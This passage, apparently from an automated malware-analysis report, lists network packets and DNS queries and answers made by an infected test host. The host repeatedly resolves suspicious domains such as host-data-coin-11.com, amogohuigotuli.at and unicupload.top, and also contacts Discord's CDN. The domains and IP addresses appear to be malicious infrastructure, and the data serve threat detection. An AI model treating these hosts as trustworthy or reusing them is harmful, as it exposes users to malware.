Jan 9, 2022 18:49:02.450244904 CET	49882	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:49:02.624635935 CET	80	49882	47.251.44.201	192.168.2.3
Jan 9, 2022 18:49:03.006741047 CET	80	49882	47.251.44.201	192.168.2.3
Jan 9, 2022 18:49:03.006895065 CET	49882	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:49:03.006951094 CET	49882	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:49:03.027271032 CET	49883	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:49:03.182041883 CET	80	49882	47.251.44.201	192.168.2.3
Jan 9, 2022 18:49:03.204876900 CET	80	49883	47.251.44.201	192.168.2.3
Jan 9, 2022 18:49:03.204967022 CET	49883	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:49:03.205075026 CET	49883	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:49:03.205094099 CET	49883	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:49:03.381746054 CET	80	49883	47.251.44.201	192.168.2.3
Jan 9, 2022 18:49:03.381807089 CET	80	49883	47.251.44.201	192.168.2.3
Jan 9, 2022 18:49:03.764148951 CET	80	49883	47.251.44.201	192.168.2.3
Jan 9, 2022 18:49:03.764307976 CET	49883	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:49:03.764444113 CET	49883	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:49:03.942379951 CET	80	49883	47.251.44.201	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 9, 2022 18:47:37.468811989 CET	54154	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:47:37.487526894 CET	53	54154	8.8.8.8	192.168.2.3
Jan 9, 2022 18:47:38.226047039 CET	52806	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:47:38.244760036 CET	53	52806	8.8.8.8	192.168.2.3
Jan 9, 2022 18:47:38.967520952 CET	53910	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:47:39.312901974 CET	53	53910	8.8.8.8	192.168.2.3
Jan 9, 2022 18:47:40.060709000 CET	64021	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:47:40.077759981 CET	53	64021	8.8.8.8	192.168.2.3
Jan 9, 2022 18:47:40.807586908 CET	60784	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:47:40.826637983 CET	53	60784	8.8.8.8	192.168.2.3
Jan 9, 2022 18:47:41.578583002 CET	51143	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:47:41.598478079 CET	53	51143	8.8.8.8	192.168.2.3
Jan 9, 2022 18:47:43.546813965 CET	56009	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:47:43.565804958 CET	53	56009	8.8.8.8	192.168.2.3
Jan 9, 2022 18:47:44.316106081 CET	59026	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:47:44.333204985 CET	53	59026	8.8.8.8	192.168.2.3
Jan 9, 2022 18:47:45.098551035 CET	49572	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:47:45.414005041 CET	53	49572	8.8.8.8	192.168.2.3
Jan 9, 2022 18:47:49.252995968 CET	56236	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:47:49.271218061 CET	53	56236	8.8.8.8	192.168.2.3
Jan 9, 2022 18:47:50.434279919 CET	56527	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:47:50.454058886 CET	53	56527	8.8.8.8	192.168.2.3
Jan 9, 2022 18:47:51.245753050 CET	63297	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:47:51.531367064 CET	53	63297	8.8.8.8	192.168.2.3
Jan 9, 2022 18:47:52.391556978 CET	50728	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:47:52.409961939 CET	53	50728	8.8.8.8	192.168.2.3
Jan 9, 2022 18:47:53.196393013 CET	57106	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:47:53.483256102 CET	53	57106	8.8.8.8	192.168.2.3
Jan 9, 2022 18:47:54.261399984 CET	56773	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:47:54.281043053 CET	53	56773	8.8.8.8	192.168.2.3
Jan 9, 2022 18:47:54.337697029 CET	60982	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:47:54.356300116 CET	53	60982	8.8.8.8	192.168.2.3
Jan 9, 2022 18:47:55.127723932 CET	58058	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:47:55.146183014 CET	53	58058	8.8.8.8	192.168.2.3
Jan 9, 2022 18:47:55.908967018 CET	64367	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:47:55.927742958 CET	53	64367	8.8.8.8	192.168.2.3
Jan 9, 2022 18:47:56.699451923 CET	51539	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:47:56.718244076 CET	53	51539	8.8.8.8	192.168.2.3
Jan 9, 2022 18:47:57.509944916 CET	55393	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:47:57.816883087 CET	53	55393	8.8.8.8	192.168.2.3
Jan 9, 2022 18:48:01.620697975 CET	50585	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:48:01.641853094 CET	53	50585	8.8.8.8	192.168.2.3
Jan 9, 2022 18:48:02.401056051 CET	63456	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:48:02.419850111 CET	53	63456	8.8.8.8	192.168.2.3
Jan 9, 2022 18:48:03.198502064 CET	58540	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:48:03.216830969 CET	53	58540	8.8.8.8	192.168.2.3
Jan 9, 2022 18:48:03.959224939 CET	55108	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:48:03.978082895 CET	53	55108	8.8.8.8	192.168.2.3
Jan 9, 2022 18:48:08.650490999 CET	58942	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:48:08.669089079 CET	53	58942	8.8.8.8	192.168.2.3
Jan 9, 2022 18:48:09.419280052 CET	49250	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:48:09.438422918 CET	53	49250	8.8.8.8	192.168.2.3
Jan 9, 2022 18:48:10.230998039 CET	63490	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:48:11.217844009 CET	63490	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:48:11.503634930 CET	53	63490	8.8.8.8	192.168.2.3
Jan 9, 2022 18:48:12.276524067 CET	65110	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:48:12.297733068 CET	53	65110	8.8.8.8	192.168.2.3
Jan 9, 2022 18:48:14.720483065 CET	61120	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:48:14.739479065 CET	53	61120	8.8.8.8	192.168.2.3
Jan 9, 2022 18:48:15.531368017 CET	53079	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:48:15.550071001 CET	53	53079	8.8.8.8	192.168.2.3
Jan 9, 2022 18:48:16.289422989 CET	50824	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:48:16.307980061 CET	53	50824	8.8.8.8	192.168.2.3
Jan 9, 2022 18:48:22.524712086 CET	56706	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:48:22.575756073 CET	53	56706	8.8.8.8	192.168.2.3
Jan 9, 2022 18:48:22.594604015 CET	53569	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:48:22.767913103 CET	53	53569	8.8.8.8	192.168.2.3
Jan 9, 2022 18:48:22.776987076 CET	62855	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:48:23.091861010 CET	53	62855	8.8.8.8	192.168.2.3
Jan 9, 2022 18:48:27.189275026 CET	51046	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:48:27.506659031 CET	53	51046	8.8.8.8	192.168.2.3
Jan 9, 2022 18:48:29.612690926 CET	65501	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:48:29.995244026 CET	53	65501	8.8.8.8	192.168.2.3
Jan 9, 2022 18:48:30.848589897 CET	49290	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:48:30.949704885 CET	53	49290	8.8.8.8	192.168.2.3
Jan 9, 2022 18:48:31.019443989 CET	59754	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:48:31.036689043 CET	53	59754	8.8.8.8	192.168.2.3
Jan 9, 2022 18:48:32.371445894 CET	57447	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:48:32.390347958 CET	53	57447	8.8.8.8	192.168.2.3
Jan 9, 2022 18:48:32.432564020 CET	63583	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:48:32.451143026 CET	53	63583	8.8.8.8	192.168.2.3
Jan 9, 2022 18:48:38.133488894 CET	64099	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:48:38.152072906 CET	53	64099	8.8.8.8	192.168.2.3
Jan 9, 2022 18:48:38.960043907 CET	64610	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:48:38.979228020 CET	53	64610	8.8.8.8	192.168.2.3
Jan 9, 2022 18:48:39.738586903 CET	51989	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:48:39.757236958 CET	53	51989	8.8.8.8	192.168.2.3
Jan 9, 2022 18:48:40.522078991 CET	53152	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:48:40.538742065 CET	53	53152	8.8.8.8	192.168.2.3
Jan 9, 2022 18:48:41.312041044 CET	61590	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:48:41.599020004 CET	53	61590	8.8.8.8	192.168.2.3
Jan 9, 2022 18:48:42.411408901 CET	56077	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:48:42.428658009 CET	53	56077	8.8.8.8	192.168.2.3
Jan 9, 2022 18:48:44.344777107 CET	57951	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:48:44.669703007 CET	53	57951	8.8.8.8	192.168.2.3
Jan 9, 2022 18:48:45.164227962 CET	53276	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:48:45.181263924 CET	53	53276	8.8.8.8	192.168.2.3
Jan 9, 2022 18:48:45.925323963 CET	60135	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:48:45.943701982 CET	53	60135	8.8.8.8	192.168.2.3
Jan 9, 2022 18:48:46.682480097 CET	49849	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:48:47.642781019 CET	49849	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:48:47.961729050 CET	53	49849	8.8.8.8	192.168.2.3
Jan 9, 2022 18:48:47.969757080 CET	53	49849	8.8.8.8	192.168.2.3
Jan 9, 2022 18:48:50.192974091 CET	60253	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:48:50.566925049 CET	53	60253	8.8.8.8	192.168.2.3
Jan 9, 2022 18:48:51.572503090 CET	58706	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:48:51.591566086 CET	53	58706	8.8.8.8	192.168.2.3
Jan 9, 2022 18:48:52.358977079 CET	62595	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:48:52.377933979 CET	53	62595	8.8.8.8	192.168.2.3
Jan 9, 2022 18:48:53.129774094 CET	51189	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:48:53.149446964 CET	53	51189	8.8.8.8	192.168.2.3
Jan 9, 2022 18:48:53.897295952 CET	49967	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:48:54.213160038 CET	53	49967	8.8.8.8	192.168.2.3
Jan 9, 2022 18:48:54.567051888 CET	51454	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:48:54.587234974 CET	53	51454	8.8.8.8	192.168.2.3
Jan 9, 2022 18:48:55.012433052 CET	57163	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:48:55.029074907 CET	53	57163	8.8.8.8	192.168.2.3
Jan 9, 2022 18:48:56.161734104 CET	56360	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:48:56.180541992 CET	53	56360	8.8.8.8	192.168.2.3
Jan 9, 2022 18:48:56.379781008 CET	49258	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:48:56.396241903 CET	53	49258	8.8.8.8	192.168.2.3
Jan 9, 2022 18:48:56.667990923 CET	56195	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:48:56.686872959 CET	53	56195	8.8.8.8	192.168.2.3
Jan 9, 2022 18:48:56.826666117 CET	53021	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:48:56.845627069 CET	53	53021	8.8.8.8	192.168.2.3
Jan 9, 2022 18:48:57.752002954 CET	64383	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:48:57.770612001 CET	53	64383	8.8.8.8	192.168.2.3
Jan 9, 2022 18:49:01.363461018 CET	50346	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:49:01.382549047 CET	53	50346	8.8.8.8	192.168.2.3
Jan 9, 2022 18:49:03.009984970 CET	50281	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:49:03.026875019 CET	53	50281	8.8.8.8	192.168.2.3
Jan 9, 2022 18:49:03.767934084 CET	56328	53	192.168.2.3	8.8.8.8
Jan 9, 2022 18:49:03.788151026 CET	53	56328	8.8.8.8	192.168.2.3

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Jan 9, 2022 18:48:32.814183950 CET	192.168.2.3	8.8.8.8	d001	(Port unreachable)	Destination Unreachable
Jan 9, 2022 18:48:47.969897032 CET	192.168.2.3	8.8.8.8	d007	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 9, 2022 18:47:37.468811989 CET	192.168.2.3	8.8.8.8	0x2ec	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:47:38.226047039 CET	192.168.2.3	8.8.8.8	0x8fc2	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:47:38.967520952 CET	192.168.2.3	8.8.8.8	0xe923	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:47:40.060709000 CET	192.168.2.3	8.8.8.8	0x1f12	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:47:40.807586908 CET	192.168.2.3	8.8.8.8	0x9741	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:47:41.578583002 CET	192.168.2.3	8.8.8.8	0xe33f	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:47:43.546813965 CET	192.168.2.3	8.8.8.8	0x212d	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:47:44.316106081 CET	192.168.2.3	8.8.8.8	0xb1f	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:47:45.098551035 CET	192.168.2.3	8.8.8.8	0xd55e	Standard query (0)	data-host-coin-8.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:47:49.252995968 CET	192.168.2.3	8.8.8.8	0x5d58	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:47:50.434279919 CET	192.168.2.3	8.8.8.8	0x5692	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:47:51.245753050 CET	192.168.2.3	8.8.8.8	0x4651	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:47:52.391556978 CET	192.168.2.3	8.8.8.8	0xda90	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:47:53.196393013 CET	192.168.2.3	8.8.8.8	0xb44d	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:47:54.261399984 CET	192.168.2.3	8.8.8.8	0x456b	Standard query (0)	unicupload.top	A (IP address)	IN (0x0001)
Jan 9, 2022 18:47:54.337697029 CET	192.168.2.3	8.8.8.8	0xeac1	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:47:55.127723932 CET	192.168.2.3	8.8.8.8	0xff6e	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:47:55.908967018 CET	192.168.2.3	8.8.8.8	0xa9f	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:47:56.699451923 CET	192.168.2.3	8.8.8.8	0x2b8d	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:47:57.509944916 CET	192.168.2.3	8.8.8.8	0x5a4b	Standard query (0)	data-host-coin-8.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:01.620697975 CET	192.168.2.3	8.8.8.8	0xafbf	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:02.401056051 CET	192.168.2.3	8.8.8.8	0xb6c9	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:03.198502064 CET	192.168.2.3	8.8.8.8	0xb721	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:03.959224939 CET	192.168.2.3	8.8.8.8	0x57c1	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:08.650490999 CET	192.168.2.3	8.8.8.8	0x5d8c	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:09.419280052 CET	192.168.2.3	8.8.8.8	0x119e	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:10.230998039 CET	192.168.2.3	8.8.8.8	0x491d	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:11.217844009 CET	192.168.2.3	8.8.8.8	0x491d	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:12.276524067 CET	192.168.2.3	8.8.8.8	0x4e14	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:14.720483065 CET	192.168.2.3	8.8.8.8	0x1984	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:15.531368017 CET	192.168.2.3	8.8.8.8	0xeeb5	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:16.289422989 CET	192.168.2.3	8.8.8.8	0x2c09	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:22.524712086 CET	192.168.2.3	8.8.8.8	0xa636	Standard query (0)	srtuiyhuali.at	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:22.594604015 CET	192.168.2.3	8.8.8.8	0xe642	Standard query (0)	fufuiloirtu.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:22.776987076 CET	192.168.2.3	8.8.8.8	0xefc3	Standard query (0)	amogohuigotuli.at	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:27.189275026 CET	192.168.2.3	8.8.8.8	0xfeee	Standard query (0)	amogohuigotuli.at	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:29.612690926 CET	192.168.2.3	8.8.8.8	0xad60	Standard query (0)	amogohuigotuli.at	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:30.848589897 CET	192.168.2.3	8.8.8.8	0xc46c	Standard query (0)	unic11m.top	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:31.019443989 CET	192.168.2.3	8.8.8.8	0xf683	Standard query (0)	amogohuigotuli.at	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:32.371445894 CET	192.168.2.3	8.8.8.8	0x763	Standard query (0)	unicupload.top	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:32.432564020 CET	192.168.2.3	8.8.8.8	0x5b5f	Standard query (0)	amogohuigotuli.at	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:38.133488894 CET	192.168.2.3	8.8.8.8	0xcf3a	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:38.960043907 CET	192.168.2.3	8.8.8.8	0x888f	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:39.738586903 CET	192.168.2.3	8.8.8.8	0x36bb	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:40.522078991 CET	192.168.2.3	8.8.8.8	0xdc59	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:41.312041044 CET	192.168.2.3	8.8.8.8	0x604d	Standard query (0)	privacytools-foryou-777.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:42.411408901 CET	192.168.2.3	8.8.8.8	0xc33a	Standard query (0)	amogohuigotuli.at	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:44.344777107 CET	192.168.2.3	8.8.8.8	0x2ee	Standard query (0)	amogohuigotuli.at	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:45.164227962 CET	192.168.2.3	8.8.8.8	0x5153	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:45.925323963 CET	192.168.2.3	8.8.8.8	0x1093	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:46.682480097 CET	192.168.2.3	8.8.8.8	0x2d79	Standard query (0)	data-host-coin-8.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:47.642781019 CET	192.168.2.3	8.8.8.8	0x2d79	Standard query (0)	data-host-coin-8.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:50.192974091 CET	192.168.2.3	8.8.8.8	0x383e	Standard query (0)	amogohuigotuli.at	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:51.572503090 CET	192.168.2.3	8.8.8.8	0x97bc	Standard query (0)	amogohuigotuli.at	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:52.358977079 CET	192.168.2.3	8.8.8.8	0xbeb8	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:53.129774094 CET	192.168.2.3	8.8.8.8	0x81f5	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:53.897295952 CET	192.168.2.3	8.8.8.8	0x9127	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:54.567051888 CET	192.168.2.3	8.8.8.8	0xbc52	Standard query (0)	amogohuigotuli.at	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:55.012433052 CET	192.168.2.3	8.8.8.8	0x7463	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:56.161734104 CET	192.168.2.3	8.8.8.8	0xc20	Standard query (0)	bit.ly	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:56.379781008 CET	192.168.2.3	8.8.8.8	0xf690	Standard query (0)	bitly.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:56.667990923 CET	192.168.2.3	8.8.8.8	0x6611	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:56.826666117 CET	192.168.2.3	8.8.8.8	0x1187	Standard query (0)	amogohuigotuli.at	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:57.752002954 CET	192.168.2.3	8.8.8.8	0xacdf	Standard query (0)	data-host-coin-8.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:49:01.363461018 CET	192.168.2.3	8.8.8.8	0x37fa	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:49:03.009984970 CET	192.168.2.3	8.8.8.8	0x5ae6	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)
Jan 9, 2022 18:49:03.767934084 CET	192.168.2.3	8.8.8.8	0xf272	Standard query (0)	host-data-coin-11.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 9, 2022 18:47:37.487526894 CET	8.8.8.8	192.168.2.3	0x2ec	No error (0)	host-data-coin-11.com		47.251.44.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:47:38.244760036 CET	8.8.8.8	192.168.2.3	0x8fc2	No error (0)	host-data-coin-11.com		47.251.44.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:47:39.312901974 CET	8.8.8.8	192.168.2.3	0xe923	No error (0)	host-data-coin-11.com		47.251.44.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:47:40.077759981 CET	8.8.8.8	192.168.2.3	0x1f12	No error (0)	host-data-coin-11.com		47.251.44.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:47:40.826637983 CET	8.8.8.8	192.168.2.3	0x9741	No error (0)	host-data-coin-11.com		47.251.44.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:47:41.598478079 CET	8.8.8.8	192.168.2.3	0xe33f	No error (0)	host-data-coin-11.com		47.251.44.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:47:43.565804958 CET	8.8.8.8	192.168.2.3	0x212d	No error (0)	host-data-coin-11.com		47.251.44.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:47:44.333204985 CET	8.8.8.8	192.168.2.3	0xb1f	No error (0)	host-data-coin-11.com		47.251.44.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:47:45.414005041 CET	8.8.8.8	192.168.2.3	0xd55e	No error (0)	data-host-coin-8.com		47.251.44.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:47:49.271218061 CET	8.8.8.8	192.168.2.3	0x5d58	No error (0)	host-data-coin-11.com		47.251.44.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:47:50.454058886 CET	8.8.8.8	192.168.2.3	0x5692	No error (0)	host-data-coin-11.com		47.251.44.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:47:51.531367064 CET	8.8.8.8	192.168.2.3	0x4651	No error (0)	host-data-coin-11.com		47.251.44.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:47:52.409961939 CET	8.8.8.8	192.168.2.3	0xda90	No error (0)	host-data-coin-11.com		47.251.44.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:47:53.483256102 CET	8.8.8.8	192.168.2.3	0xb44d	No error (0)	host-data-coin-11.com		47.251.44.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:47:54.281043053 CET	8.8.8.8	192.168.2.3	0x456b	No error (0)	unicupload.top		54.38.220.85	A (IP address)	IN (0x0001)
Jan 9, 2022 18:47:54.356300116 CET	8.8.8.8	192.168.2.3	0xeac1	No error (0)	host-data-coin-11.com		47.251.44.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:47:55.146183014 CET	8.8.8.8	192.168.2.3	0xff6e	No error (0)	host-data-coin-11.com		47.251.44.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:47:55.927742958 CET	8.8.8.8	192.168.2.3	0xa9f	No error (0)	host-data-coin-11.com		47.251.44.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:47:56.718244076 CET	8.8.8.8	192.168.2.3	0x2b8d	No error (0)	host-data-coin-11.com		47.251.44.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:47:57.816883087 CET	8.8.8.8	192.168.2.3	0x5a4b	No error (0)	data-host-coin-8.com		47.251.44.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:01.641853094 CET	8.8.8.8	192.168.2.3	0xafbf	No error (0)	host-data-coin-11.com		47.251.44.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:02.419850111 CET	8.8.8.8	192.168.2.3	0xb6c9	No error (0)	host-data-coin-11.com		47.251.44.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:03.216830969 CET	8.8.8.8	192.168.2.3	0xb721	No error (0)	host-data-coin-11.com		47.251.44.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:03.978082895 CET	8.8.8.8	192.168.2.3	0x57c1	No error (0)	host-data-coin-11.com		47.251.44.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:08.669089079 CET	8.8.8.8	192.168.2.3	0x5d8c	No error (0)	host-data-coin-11.com		47.251.44.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:09.438422918 CET	8.8.8.8	192.168.2.3	0x119e	No error (0)	host-data-coin-11.com		47.251.44.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:11.503634930 CET	8.8.8.8	192.168.2.3	0x491d	No error (0)	host-data-coin-11.com		47.251.44.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:12.297733068 CET	8.8.8.8	192.168.2.3	0x4e14	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:12.297733068 CET	8.8.8.8	192.168.2.3	0x4e14	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:12.297733068 CET	8.8.8.8	192.168.2.3	0x4e14	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:12.297733068 CET	8.8.8.8	192.168.2.3	0x4e14	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:12.297733068 CET	8.8.8.8	192.168.2.3	0x4e14	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)
